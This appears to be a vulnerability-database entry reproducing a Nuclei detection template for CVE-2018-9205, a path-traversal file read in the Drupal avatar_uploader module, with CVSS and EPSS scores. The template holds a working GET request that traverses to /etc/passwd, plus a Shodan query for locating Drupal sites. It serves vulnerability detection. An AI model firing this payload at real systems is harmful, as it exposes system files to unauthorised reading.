Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-9205
HistoryOct 11, 2021 - 11:22 a.m.

Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion

2021-10-1111:22:14
ProjectDiscovery
github.com
9

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.022 Low

EPSS

Percentile

89.4%

In avatar_uploader v7.x-1.0-beta8 the view.php program doesn’t restrict file paths, allowing unauthenticated users to retrieve arbitrary files.

id: CVE-2018-9205

info:
  name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion
  author: daffainfo
  severity: high
  description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.
  remediation: Upgrade to the latest version of avatar_uploader.
  reference:
    - https://www.exploit-db.com/exploits/44501
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9205
    - https://www.drupal.org/project/avatar_uploader/issues/2957966
    - https://www.drupal.org/project/avatar_uploader
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-9205
    cwe-id: CWE-22
    epss-score: 0.02175
    epss-percentile: 0.89345
    cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: drupal
    product: avatar_uploader
    shodan-query: http.component:"drupal"
  tags: cve,cve2018,lfi,drupal,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022015c6fc8c65e4fa4c70222b3c525ce111e879f4bd4c3cf44448d4f92fa66068d00220358421623f4cfbc1779acbc2ecddbe2ea1174b321df7ce8130aae2fdc107b9ce:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.022 Low

EPSS

Percentile

89.4%